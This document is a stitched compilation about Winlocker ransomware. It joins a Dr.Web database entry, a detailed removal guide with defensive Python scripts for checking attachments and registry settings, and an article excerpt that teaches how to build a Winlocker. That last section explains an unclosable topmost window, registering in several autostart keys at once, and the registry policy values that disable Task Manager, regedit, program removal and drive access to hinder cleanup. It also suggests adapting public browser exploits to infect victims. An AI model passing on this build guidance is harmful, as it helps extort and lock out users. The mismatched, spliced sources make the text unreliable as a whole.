Winlocker is a class of malware that locks the user out of the operating system. Once it gets onto a computer it goes to work immediately: it registers itself in system startup so that it launches together with Windows. Once running, it blocks practically all mouse and keyboard input and at the same time demands that a sum of money be sent to a specified account, after which it will supposedly remove itself. Of course, if the user falls for this, the system is not unlocked.

Winlocker is usually an .exe file. It is most often distributed in e-mails and instant messages crafted to interest the recipient, with an attachment presented as a picture or a video (when in fact it is the Winlocker itself). To avoid the trick, the user only needs to be vigilant and look at the extension of the file that was sent. Images normally have extensions such as .jpg, .png or .gif; videos have .avi, .mp4, .flv and so on. If the extension is not one of these, the file is most likely an executable (Winlocker has the .exe extension). One caveat: by default Windows hides the extensions of known file types, so a file named photo.jpg.exe is displayed as photo.jpg. Turn off "Hide extensions for known file types" in Folder Options before relying on this check, or better, judge the file by its contents rather than its name.
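Going a step beyond checking the displayed name, the following Python script (an added example, not part of the original article) classifies an attachment by its real content as well as by its extension: it looks for the MZ/PE header that every Windows executable carries, so a PE file renamed to .jpg, or a double-extension name such as photo.jpg.exe, is caught even when Windows hides the final extension. The file names and byte strings are constructed for the demonstration, and the lists of what counts as "media" and "executable" extensions are assumptions.

```python
"""Tell an executable attachment from a real image or video by content, not just by name.
Added example; not from the original article. Names and byte strings are constructed."""
import struct

MEDIA_EXTS = {"jpg", "jpeg", "png", "gif", "avi", "mp4", "flv"}          # assumption: what the page calls pictures/videos
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd"}                   # assumption: extensions Windows runs on double-click


def is_pe_file(data: bytes) -> bool:
    """A Windows executable starts with 'MZ', and the DWORD at offset 0x3C (e_lfanew)
    points at the 'PE\\0\\0' signature. Everything else is not a PE, whatever its name."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify_attachment(name: str, data: bytes) -> str:
    exts = name.lower().split(".")[1:]          # every extension after the base name
    last = exts[-1] if exts else ""
    if last in EXEC_EXTS:
        # photo.jpg.exe: Explorer hides the trailing ".exe" by default and shows "photo.jpg"
        if len(exts) >= 2 and exts[-2] in MEDIA_EXTS:
            return "double-extension executable"
        return "executable"
    if is_pe_file(data):
        # a PE renamed to .jpg does not run on double-click, but it is still an executable
        return "disguised executable"
    if last in MEDIA_EXTS:
        return "media"
    return "unknown"


# Constructed samples (not real malware): a minimal MZ/PE header and a JPEG header.
def fake_pe() -> bytes:
    dos_header = bytearray(b"MZ" + b"\0" * 0x3E)      # 0x40-byte DOS header
    struct.pack_into("<I", dos_header, 0x3C, 0x40)    # e_lfanew -> right after the DOS header
    return bytes(dos_header) + b"PE\0\0" + b"\0" * 20


JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\0" * 60       # JFIF start-of-image marker

if __name__ == "__main__":
    samples = [("photo.jpg.exe", fake_pe()), ("holiday.jpg", fake_pe()),
               ("holiday.jpg", JPEG_HEADER), ("clip.avi.scr", fake_pe())]
    for fname, blob in samples:
        print(f"{fname:15} -> {classify_attachment(fname, blob)}")
```

In a mail gateway the same check is applied to the decoded attachment bytes before the user ever sees the name; on a workstation it is the reason to trust Folder Options' "View" settings less than a hex editor.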

How to remove Winlocker?

If this malware has nonetheless got onto your PC, first remove it from startup and only then delete it from the disk. Before removing it, check which functions Winlocker has blocked. Press Ctrl+Alt+Delete to open Task Manager. If that does nothing, try opening the Run dialog with Win+R and entering the regedit command.

In most cases neither of these works. Then boot the computer in Safe Mode (on Windows XP, Vista and 7, press F8 as the computer starts, before the Windows logo appears). From Safe Mode, run regedit (from the Run dialog or a command prompt) to open the Registry Editor and go to the keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Remove the entries that point to the Trojan. Judge by the path and file name, not by whether the name is unfamiliar to you: for example, hkcmd.exe, igfxtray.exe and igfxpers.exe, which often appear here, are components of the Intel graphics driver, not malware. Then go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and check the Shell and Userinit values: Shell should contain only explorer.exe, and Userinit only the path to userinit.exe (C:\WINDOWS\system32\userinit.exe, with a trailing comma).

Usually the Trojan either replaces one of these values with the path to its own file or, since both values are comma-separated lists, appends its path after the legitimate one. Note that path, restore the correct values, then follow the path, find the file and delete it.

Aliases in other anti-virus products: TROJ_VB.ACD, TR/Dropper.Gen, Trojan.Win32.Sovest.m, BehavesLike:Win32.Malware, Trojan:Win32/Sisproc, Trojan.Agent.JF, KillApp.L, Trojan.VB.NID, Generic.cd, Trojan.Win32.Sovest.v, Generic.dx, BackDoor.Generic2.IIE, Trojan:Win32/Bumat!rts, VirTool:Win32/Obfuscator.M, Trojan.Win32.VB.bav, Trojan.Win32.Sovest.g, Backdoor.Pcclient.HR, Trojan Horse, Trojan:Win32/Provis!rts, Generic.BPD, TROJ_AGENT.WPQ, Trojan.Win32.Sovest.k, TROJ_AGENT.ABW, Trojan.Agent.VB.AQG

Added to the Dr.Web virus database: 2005-09-20

Description added: 2006-01-31

Virus type: Trojan horse

Vulnerable OS: Win NT-based

Size: 119,296 bytes

Packed: -

Technical information

System recovery information

Contact the Doctor Web Technical Support Service to receive instructions on how to restore the system.


Windows:
  1. If the operating system can boot (in normal mode or in Safe Mode), download Dr.Web CureIt! and use it to run a full scan of your computer and of the removable media you use.
  2. If the operating system cannot boot, change the BIOS settings so that the PC can boot from a CD or a USB drive. Download the Dr.Web LiveDisk system recovery image, or the utility for writing Dr.Web LiveDisk to a USB drive, and prepare the appropriate media. Boot the computer from that media, run a full scan and disinfect the detected threats.
Android:
  1. If your mobile device is functioning normally, download and install the free anti-virus product Dr.Web for Android Light on it. Perform a full system scan and follow the recommendations to neutralize the detected threats.
  2. If your mobile device is blocked by a ransomware Trojan of the Android.Locker family (the screen displays an accusation of breaking the law, a demand to pay a certain sum of money, or another message that interferes with normal use of the device), do the following:
    • boot the smartphone or tablet into safe mode (depending on the version of the operating system and the specific device, this is done in different ways; consult the instructions supplied with the device, or its manufacturer);
    • after safe mode is active, install a free anti-virus product on the infected device

Lately, cases of infection with the Trojan.Winlock virus have become more frequent. Not just more frequent: a whole epidemic has begun. Several million computers are infected in Russia, and the number grows every day. We will try to explain how to remove the Trojan.Winlock virus.

To begin with, a little information about the virus itself: how it gets onto the computer, what it does, and what the consequences of its presence on the user's PC are.

Trojan.Winlock is a fraudulent Trojan program designed to extort money from PC users. It gets onto computers mainly through adult sites. Yes, it is visitors to these sites who are at risk; one could even say they make up 98% of all victims. The remaining 2% are visitors to social networks such as Odnoklassniki. These figures are not taken out of my head but from experience in working with people affected by this virus.

How does a virus get onto a computer?

The most common way the virus gets onto a computer is this. Say you often visit adult sites. You go to such a site intending to watch a video, click the play button, and a window appears asking you to update a codec, a driver or Adobe Flash Player. Of course, this is a trick. The window usually has two buttons, YES and NO. Some people press YES immediately; others, thinking it over because they already have everything installed, press NO. The main rule: BEFORE YOU INSTALL ANYTHING, CHECK WHETHER YOU ARE REALLY MISSING IT. In both cases you have still fallen for the scammers' trick: in the first case you get the virus immediately, and in the second, having clicked NO, you see the window again. This can be dealt with. Because the pop-up stays on top of the browser, you will not be able to close the tab with the open site or the browser itself with the mouse. The key combination CTRL+ALT+DEL helps here. In the Windows Task Manager that appears, go to the Applications tab, select your browser in the list of running applications and click End Task. You can do the same on the Processes tab: find the process named your_browser_name.exe and click End Process.

Here are some examples of how the Trojan.Winlock virus spreads.

But what should those who pressed YES and received the virus on their computer do? Below is a solution for removing Trojan.Winlock from your PC.

What does a virus do to a computer and what are the consequences?

Trojan.Winlock blocks the Windows operating system so that the user cannot do anything to destroy the virus. Usually it is a window covering the entire screen with a fake warning that you are using unlicensed software (a clever move, by the way: it works instantly on the Russian psyche, since most software on computers in Russia is not licensed), or that your access to your favourite site has expired, or something similar (there are hundreds of variants of the virus). Some variants show a window in the middle of the screen rather than full screen, but positioned so that it is very inconvenient for the user to work on removing the virus or to search for information on the Internet. The window also demands that an SMS be sent to a certain short number to unlock the system. The victim's first mistake is complying with the attackers' demands. People send the SMS, a certain sum (usually 300 to 500 roubles) is withdrawn from their account, and they enter the received code into a special text field. There is one "but". Some people do receive a code, enter it, and the system is unlocked, but the virus remains on the computer and becomes active again after a while. The rest never receive a code, and the money disappears without a trace.

Blocking examples.

The virus hampers the user's work with all sorts of prohibitions: for example, the Registry Editor, Task Manager, Control Panel applets, the Run menu, the command prompt and much more are blocked. Meanwhile the Trojan registers itself in the registry and copies itself to certain directories; some variants also block Internet access. When Trojan.Winlock first appeared on the Russian Internet, the versions were the most primitive: they deleted themselves after a few hours of operation, in some versions it was enough to enter seven zeros to free the system, and they did not start in Windows Safe Mode. If such a Trojan has landed on you, the task of destroying it is simpler; if it is a newer modification, the task is correspondingly harder. The consequences of having Trojan.Winlock on a computer vary: from the cost of the SMS sent to the attackers and the cost of calling a specialist to remove the virus, to the loss of data (for example, if Windows has to be reinstalled) and a non-working Internet connection. It all depends on luck, on which "pet" you have caught.

Removing the Trojan.Winlock virus

So, you have become a victim of Trojan.Winlock. What to do?

The removal methods described below require at least basic computer knowledge, so if you are a novice, we recommend contacting computer help straight away.

1. First method. Suitable when the Trojan window is stretched to fill the entire screen; the Registry Editor, Task Manager (CTRL+ALT+DEL) and Run (WIN+R) are blocked; you cannot switch to any other window; and in Safe Mode (press F8 as the PC starts, before the Windows logo appears, and select Safe Mode) you see exactly the same picture as in normal mode, i.e. the virus is active there too. Requires a boot disk (BootCD, LiveCD). That is the only drawback of this method, because not everyone has such a disk, but for me personally it is the most convenient and fastest. In fact you can disregard everything said above about this method and keep one condition: you must have a bootable CD/DVD.

2. Second method. Suitable if you do not have a boot disk, the Trojan window is full screen or in the middle of the screen, everything listed in the first method is blocked (or partially blocked), but you are able to boot into Safe Mode and the virus window does not appear there.

3. Third method. Suitable if you do not have a boot disk, the Trojan window is full screen or in the middle of the screen, everything listed in the first method is blocked (or partially blocked), and the virus is active in Windows Safe Mode as well.

After we have decided on the method, we proceed to removal.

The first way to remove a virus

Take a boot disk; its name does not matter much, the main thing is that it carries a rescue operating system (you could, of course, use Norton Commander from a floppy disk if you are lucky enough to have one, but we are in the 21st century).

So we need to make the computer boot from the optical drive before the hard disk. This is done in the BIOS settings. When you turn on the computer, at the very beginning you will see the message "Press DEL to enter Setup" (on laptops it is usually F2 instead of DEL). After you press that key, BIOS Setup loads. Using the arrow keys and Enter, go to the Advanced BIOS Features section. What follows depends on the BIOS manufacturer: in some you need to find the Boot Device Priority item, enter it and set the boot order there; in others the priority settings are right in the Advanced BIOS Features section. With even a little English you will figure it out. You are looking for something like this:

1st Boot Device
2nd Boot Device
3rd Boot Device

1st Boot Device is the device that boots first; the hard disk (HDD) is usually set here. Press Enter (or another key; see the help panel at the bottom of the BIOS screen) and select CD-ROM.
2nd Boot Device is the device that boots second. Press Enter (or another key; see the help panel) and select HDD.

The device is selected. Now save the changes: return to the main menu and select Save and Exit Setup. In the window that appears, enter "Y" and press Enter. Insert the disc into the drive. At the right moment during startup the boot disk will start loading. The rescue operating systems on such disks differ: some look almost like regular Windows and have Explorer, others use a file manager (for example Total Commander) instead of Explorer. That does not matter; the main thing is that you can navigate directories and delete files.

Let's start cleaning the system. The most common directories where our Trojan is copied are:

in Windows XP

C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Application Data
C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Temp
C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Temporary Internet Files

in Windows Vista/Windows 7

C:\Users\YOUR_ACCOUNT_NAME\AppData\Roaming
C:\Users\YOUR_ACCOUNT_NAME\AppData\Local\Temp
C:\Users\YOUR_ACCOUNT_NAME\AppData\Local\Microsoft\Windows\Temporary Internet Files

At the root of the first path we look for .exe and .tmp files that are unfamiliar to us. Then we move on to the most inhabited places of the virus, paths 2 and 3. In the Temp folder select all files and folders and delete them; this is safe. In the Temporary Internet Files folder select all the files and delete them; if there are folders there, delete the files inside those folders. You can also look through C:\, C:\Program Files, C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Cookies and C:\WINDOWS (a malicious cmon.exe is often found in C:\WINDOWS; delete it), but usually cleaning paths 2 and 3 is enough. If there are several users on the computer, do the same for their accounts as a precaution. That completes the cleaning. Now reboot, remove the boot disk and wait for moment "X". Here is the welcome screen, the Desktop starts to load, and the virus window does not appear: you did everything right. If it does appear, you did not clean well enough; boot from the disk again and go through all the paths once more, you may have missed something.

For those whose Trojan is "lost": we deleted the files themselves, but the virus may have left entries in the registry, so the registry needs cleaning too. Go to Start -> Run (WIN+R), type regedit and press Enter. If you see the message "Registry editing has been disabled by your administrator", see the "Prohibitions" section of the article. If everything is fine, go to the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. This key stores the startup entries of the current user; they are shown in the right-hand pane. Of course, you cannot know the names of all programs and system files, so pay attention to the paths to the files, shown in the Data column.

You can recognise the virus by its path: it leads to the Temp or Temporary Internet Files folder, or to Application Data. The file name in the path also gives it away; the file may be called something like ~DFFE93.tmp or 16A8.exe. The entry itself can be called anything; very often it is called Microsoft Audio Driver or something similar. What matters is not the entry name but the path and file name; remember this. Suppose we found nothing suspicious here. Now go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. There are usually more entries here; check them for virus entries in the same way. Then check three more keys (they are all nearby):

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

Next go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. (RunServices, listed above, is only processed by Windows 9x/ME, so its absence on XP and later is normal.) There are several values here where the Trojan could register itself: Userinit, UIHost and Shell. Here is how they look by default on Windows XP (Vista and 7 do not use UIHost, so it may be absent there):

Userinit = C:\WINDOWS\system32\userinit.exe,
UIHost = logonui.exe
Shell = explorer.exe

Compare these with yours and fix anything that differs. Keep in mind that Userinit and Shell are comma-separated lists, so the Trojan often leaves the legitimate entry in place and appends its own path after it; anything beyond the single expected program is suspect. That's all. If everything was done correctly, the virus has been removed from the computer. But remember: there are very many varieties of Trojan.Winlock. We have shown where most of these Trojans register and copy themselves, but there may be differences.
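The same checks apply to the short removal guide at the top of the page and to the registry walk-through just described, so here is one Python triage script (an added example, not the article's own; the sample export, account name and file names are constructed) that applies them mechanically to a Registry Editor export of the Run keys and the Winlogon key. It flags startup entries that run from Temp, Temporary Internet Files or Application Data or that have random hex-style names, and Winlogon values that contain anything besides the single expected program. Export the keys with regedit (File -> Export) or `reg export` from Safe Mode or a rescue environment; the export is UTF-16 text.

```python
"""Triage Run-key and Winlogon entries from a registry export of the infected machine.
Added example, not from the original article. Input is the text of a Registry Editor
export (regedit -> File -> Export, or `reg export`); those files are UTF-16, so open them
with encoding="utf-16". SAMPLE_REG below is constructed."""
import re
from typing import Dict, List

RUN_KEY_SUFFIXES = (
    r"\CurrentVersion\Run", r"\CurrentVersion\RunOnce", r"\CurrentVersion\RunOnceEx",
    r"\CurrentVersion\RunServices", r"\Policies\Explorer\Run",
)
WINLOGON_SUFFIX = r"\Windows NT\CurrentVersion\Winlogon"
# Each Winlogon value is a comma-separated list that must contain exactly this one program.
WINLOGON_DEFAULTS = {"Userinit": "userinit.exe", "Shell": "explorer.exe", "UIHost": "logonui.exe"}
# Folders the article names as the Trojan's favourite hiding places (XP and Vista/7 names).
STAGING_DIRS = ("\\temp\\", "\\temporary internet files\\", "\\application data\\", "\\appdata\\")
# Names like 16A8.exe or ~DFFE93.tmp: short hex strings, nothing a vendor would pick.
RANDOM_NAME = re.compile(r"^(~df)?[0-9a-f]{3,8}\.(exe|tmp)$", re.IGNORECASE)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key_path: {value_name: string_data}} for the REG_SZ values of a .reg export."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"') and '"="' in line:
            name, _, data = line[1:-1].partition('"="')
            keys[current][name] = data.replace("\\\\", "\\")   # .reg files escape backslashes
    return keys


def basename(path: str) -> str:
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1]


def triage(keys: Dict[str, Dict[str, str]]) -> List[str]:
    findings = []
    for key, values in keys.items():
        lowered = key.lower()
        if lowered.endswith(WINLOGON_SUFFIX.lower()):
            for name, expected in WINLOGON_DEFAULTS.items():
                data = values.get(name)
                if data is None:
                    continue            # UIHost is absent on Vista/7; that is normal
                entries = [e.strip() for e in data.split(",") if e.strip()]
                if len(entries) != 1 or basename(entries[0]).lower() != expected:
                    findings.append(f"Winlogon\\{name} = {data} (expected only {expected})")
        elif any(lowered.endswith(s.lower()) for s in RUN_KEY_SUFFIXES):
            for name, data in values.items():
                path = data.lower()
                reasons = []
                if any(d in path for d in STAGING_DIRS):
                    reasons.append("runs from a temp/profile folder")
                if RANDOM_NAME.match(basename(path)):
                    reasons.append("random-looking file name")
                if reasons:
                    findings.append(f"{key}\\{name} -> {data} ({'; '.join(reasons)})")
    return findings


# Constructed sample export: one legitimate entry, one Trojan entry, one hijacked Userinit.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"Microsoft Audio Driver"="C:\\Documents and Settings\\user\\Local Settings\\Temp\\16A8.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\WINDOWS\\cmon.exe"
"UIHost"="logonui.exe"
"""


def run_sample() -> List[str]:
    return triage(parse_reg_export(SAMPLE_REG))


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The script only reads; the fix is still done by hand in regedit (or with `reg delete`), and every flagged path is then followed on disk to delete the file, exactly as the text describes. Expand STAGING_DIRS and the suffix list for the variant you are dealing with rather than trusting the defaults.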

The second way to remove the virus

In this method we have no boot disk, but the virus is not active in Windows Safe Mode. Everything is simple here. Boot into Safe Mode (described above). We now have an almost complete OS. Do the same as in the first method, starting from the words "Let's start cleaning the system. The most common directories where our Trojan is copied are:". After completing the steps, reboot the computer and enjoy life (if everything was done correctly).

The third way to remove a virus

This method is for the unlucky: you have no boot disk and the virus is active in Safe Mode. What to do? Suffer. This is the longest way to remove the virus. If the virus window is in the middle of the screen, the Start menu and parts of the Desktop are visible. Open My Computer, then Tools -> Folder Options -> View -> Show hidden files and folders -> OK. If hidden files still are not shown, the virus has disabled showing hidden files; see the "Prohibitions" section of the article. Assuming hidden files and folders are displayed, do the same as in the first method after the words "Let's start cleaning the system. The most common directories where our Trojan is copied are:". There is one catch: the virus window gets in the way of the folder windows. You will have to resize windows, drag them back and forth and view their contents in parts. Very inconvenient, but there is nothing to be done about it. Open Task Manager? Even if it is allowed, you still will not see it, because it will be behind the virus window. A very unpleasant situation. If you have Process Explorer from Sysinternals, try running it: it shows all processes, even hidden ones, and you can try to kill the virus process through it. But again, some varieties prevent any files from running at all. So it depends on your luck (if it starts, switch to it with ALT+TAB; unlike Task Manager, it will appear on top of the virus window). Under such conditions you have to clean the system of the virus, then reboot and clean the registry. It should work out; be patient.

The next situation is when the virus window is stretched to fill the entire screen. That is even worse. All the windows you open stay behind the virus window (if you are lucky and have an old version, they had trouble keeping other windows hidden, and with a little effort you can bring the desired window to the foreground: use ALT+TAB, WIN+D and ingenuity). There is one more trick: press WIN+U. On Windows XP the Utility Manager appears. Enable Magnifier or the On-Screen Keyboard, it does not matter which; the point is that on start a Help window appears with a link to the Microsoft website, which launches the browser. If the Internet is connected, you can search for information about the virus or download Dr.Web CureIt!; choose "Run" rather than "Save". Scan the system with it, maybe it will find something, although this trick only worked with older versions of the Trojan. If only there were an anti-virus that reliably detected and destroyed Trojan.Winlock... Try System Restore; in some cases it helps. To do this, boot into Safe Mode with Command Prompt: press F8 during Windows startup (before the logo and progress bar appear) and select Safe Mode with Command Prompt. At the prompt, enter C:\WINDOWS\system32\Restore\rstrui.exe and follow the on-screen instructions. You can also edit the registry from there by running regedit.exe; what to delete in the registry is described above. But the virus may have blocked all of this. Try everything described above; if things are really bad, only reinstalling the OS will save you. Better still, call a computer repair service, spend a little and solve the problem.

It is no secret that many users are so far from information technology that letting them work with a device as complex as a computer is asking for trouble. But how do you restrict access to a PC? After all, anyone whose hands grow out of roughly the right place can turn on a computer these days. Fortunately, there is a whole class of programs that restrict user access to various components of the operating system: from a simple ban on playing Solitaire or Minesweeper to completely locking Windows.

How does infection occur?

However, not all users agree to lock their system voluntarily (I want to stress that this article does not cover the creation of malware). So such software is often delivered to their machines in the form of a virus. There are very many ways to infect a victim. Among them, the most popular are:

1. BROWSER BUGS. It is no secret that one of the targets of the modern virus writer is the user's browser. Useful web services are a dime a dozen, and of course users use them. For many, the browser is the most frequently used program and is rarely closed (mine is never closed at all).

There is no need to consult a fortune teller to find out which door is best for breaking into the user's system; it is obvious: exploit the vulnerabilities of the most popular browsers. Applying this method takes no special intelligence. It is enough to browse security sites, find a suitable exploit (if one exists) and dress it up for your needs. Fast, easy and free.

2. FLASH. Adobe has been slipping up regularly in recent months. They barely have time to release a new version of Flash Player before hackers discover a critical vulnerability in it. They find them and rub the developers' noses in them, but the developers are in no hurry to fix them.
It is foolish to believe that virus writers will meanwhile sit quietly and wait for the bug to be patched. They constantly try to take advantage of a fresh vulnerability and squeeze the maximum benefit out of it. As a result, after you watch a funny video, the system begins to behave strangely.

3. USER NAIVETY. When I started preparing this article, for the sake of experiment I loaded an OS into a virtual machine and tried wandering around "dubious" sites. You won't believe it, but I managed to pick up a Winlocker three times by agreeing to install the "latest version" of Flash Player and "special" codecs. To be honest, I was a little shocked, because I thought such methods no longer worked.

What will we code on?

I thought for a long time about which language to write the examples for this article in, and decided to go back to the time-tested Delphi. "But your exe will be about a megabyte!", you object. You are partly right, but we will solve this problem at the design stage of the project. All code will be written against the pure API, so in compiled form our creature will weigh less than 100 KB. We will shed another couple of tens of kilobytes by running the resulting binary through an executable packer.

The basis of any Winlocker

The foundation of any Winlocker is a form stretched across almost the entire screen. Moreover, it is not just a large form but a window that overlaps all the others and does not obey the usual commands: neither minimize nor resize nor close. At first glance it may seem that virus writers have invented some know-how, but in reality everything is much simpler. It is the most ordinary window, with the "always on top" (topmost) style set. To make the window behave like a partisan and ignore the user's requests, the developers slightly modify the window's message-handling procedure. Terminating the process is a separate matter: nothing about the window itself prevents that, which is why the lockers additionally block Task Manager, as described below.

The modification comes down to the trivial handling of the WM_SYSCOMMAND message: in the message-handling procedure you only need to intercept WM_SYSCOMMAND and not pass it on to the default handler. The funny thing is that no code is needed inside the handler at all. The system-menu commands (minimize, maximize, restore, move, close, including Alt+F4) all arrive as WM_SYSCOMMAND, so swallowing the message is enough for the form to stop responding to them.

Autostart

The virus must be loaded along with the operating system. There are several ways to make a program start automatically; conventionally they can be divided into two groups, simple and advanced. There is not enough space in the article for the advanced ones, so we will consider only the simple ones, based on the registry. There are several autostart corners in the registry:

  1. HKLM\Software\Microsoft\Windows\CurrentVersion\Run - programs launched when any user logs on.
  2. HKCU\Software\Microsoft\Windows\CurrentVersion\Run - the same, but only for the current user.
  3. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - a list of programs launched before users log on (Windows 9x/ME only; NT-based Windows does not process this key).
  4. HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - programs added to startup through Group Policy ("Run these programs at user logon").
  5. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows - the Load and Run values of this key (in practice the HKCU copy) are the registry equivalent of the old win.ini load= and run= lines and are still processed at logon.
  6. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon - this key holds the Winlogon settings, including the Shell and Userinit values, and nothing prevents you from specifying the path to your own program there.
  7. The Startup folder. Perhaps the most primitive method, but nevertheless many virus writers use it.

Which of the suggested startup locations should you choose for your creation? There is no exact answer, but it is highly inadvisable to bet everything on any one of them. It is much better to use a combination, that is, to register in several places at once. An example of writing to autostart using the WinAPI is given in the second box.

Lock you, lock me!

The Local Group Policy Editor snap-in (gpedit.msc) lets you, for example, easily designate a program that will be launched after logon or block the start of a specific application. Almost all operations performed through this snap-in modify certain registry keys, and if you find out which keys are modified, you can change them directly from your own program. How? There are two options: trial and error, or the Process Monitor utility by Mark Russinovich. The second is clearly cooler, so download the utility and start researching.

Registry Editor

Most users are used to editing the registry with the built-in Windows Registry Editor, regedit. Since our virus makes changes to the registry, we need to stop a careless user from poking around in it; there is no point in him sticking his curious nose where it does not belong. The easiest way is to block the launch of the Registry Editor: create a DWORD value named DisableRegistryTools with data 1 under the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.

Task Manager

Without exception, all the winlockers I have seen blocked the launch of Task Manager. Let's not lag behind them. This is done by creating a DWORD value DisableTaskMgr with data 1 in the same key as DisableRegistryTools.

Installation and removal of programms

Particularly clever users try to install an anti-virus through the "Add or Remove Programs" applet when the system is infected. This is easy to stop by creating a DWORD value NoAddRemovePrograms with data 1. It lives under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall, next to the System key that holds DisableRegistryTools.

Blocking access to disks

To completely ruin the user's mood, you can block access to the drives present in the system. Let the user not even try to run an anti-virus from a flash drive! This is done by creating a DWORD value NoViewOnDrive under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (or the HKCU equivalent). The data is a bitmask of the drives to block: bit 0 is A, bit 1 is B, bit 2 is C, and so on, so drive C is 4 and drive D is 8. To block several drives, add their masks together: a value of 12 locks C (4) and D (8). Note that this only stops Explorer from opening the drives; it does not stop a program being launched by other means, such as from a command prompt.
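The restriction values from this and the preceding three sections are all plain DWORDs, so undoing them is a matter of reading them back and deleting them. The Python script below (an added example, not from the article; the sample `reg query` output is constructed) parses `reg query` output for the Policies\System, Policies\Uninstall and Policies\Explorer keys, decodes the NoViewOnDrive drive bitmask into letters, and prints the reg.exe commands that revert each restriction. The NoDrives value is included on the assumption that it is worth checking alongside NoViewOnDrive.

```python
"""Decode the policy values a winlocker sets and emit the reg.exe commands that revert them.
Added example, not from the original article. Input is the text printed by `reg query <key>`
(run from Safe Mode with Command Prompt, or after booting once the locker is gone);
SAMPLE_QUERY below is constructed."""
import re
from typing import Dict, List, Tuple

# Value name -> what it blocks when non-zero. NoDrives is an assumption: a sibling value
# that hides drives in Explorer and is often set together with NoViewOnDrive.
KNOWN_RESTRICTIONS = {
    "DisableRegistryTools": "Registry Editor",
    "DisableTaskMgr": "Task Manager",
    "NoAddRemovePrograms": "Add or Remove Programs applet",
    "NoViewOnDrive": "opening these drives in Explorer",
    "NoDrives": "showing these drives in Explorer",
}
DRIVE_MASK_VALUES = {"NoViewOnDrive", "NoDrives"}
KEY_LINE = re.compile(r"^(HKEY_[A-Z_]+\\.+?)\s*$")
VALUE_LINE = re.compile(r"^\s+(\S+)\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$")


def parse_reg_query(text: str) -> Dict[Tuple[str, str], int]:
    """{(key, value_name): dword} for the REG_DWORD lines of `reg query` output."""
    values: Dict[Tuple[str, str], int] = {}
    key = None
    for line in text.splitlines():
        m = KEY_LINE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            values[(key, m.group(1))] = int(m.group(2), 16)
    return values


def drives_from_mask(mask: int) -> List[str]:
    """Bit n stands for drive letter chr(ord('A') + n): A=1, B=2, C=4, D=8, so 12 = C and D."""
    return [chr(ord("A") + bit) for bit in range(26) if mask & (1 << bit)]


def describe_restrictions(values: Dict[Tuple[str, str], int]) -> List[Tuple[str, str, str]]:
    findings = []
    for (key, name), data in values.items():
        if name not in KNOWN_RESTRICTIONS or data == 0:
            continue                      # zero means the policy is not in effect
        what = KNOWN_RESTRICTIONS[name]
        if name in DRIVE_MASK_VALUES:
            what += ": " + ", ".join(drives_from_mask(data))
        findings.append((key, name, what))
    return findings


def revert_commands(findings: List[Tuple[str, str, str]]) -> List[str]:
    """Deleting the value restores the default (no restriction). Run as an administrator and
    log off/on; if the locker process is still running it will simply write the values again."""
    return [f'reg delete "{key}" /v {name} /f' for key, name, _ in findings]


# Constructed `reg query` output: four restrictions set, NoDrives present but zero.
SAMPLE_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableRegistryTools    REG_DWORD    0x1
    DisableTaskMgr    REG_DWORD    0x1

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall
    NoAddRemovePrograms    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoViewOnDrive    REG_DWORD    0xc
    NoDrives    REG_DWORD    0x0
"""


def run_sample():
    findings = describe_restrictions(parse_reg_query(SAMPLE_QUERY))
    return findings, revert_commands(findings)


if __name__ == "__main__":
    found, commands = run_sample()
    for key, name, what in found:
        print(f"{name} under {key}: blocks {what}")
    print("\n".join(commands))
```

Kill the locker (or boot without it) before running the generated commands; a policy value that is deleted while the locker is running is rewritten on its next timer tick, which is also a cheap way to confirm the process is still alive.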

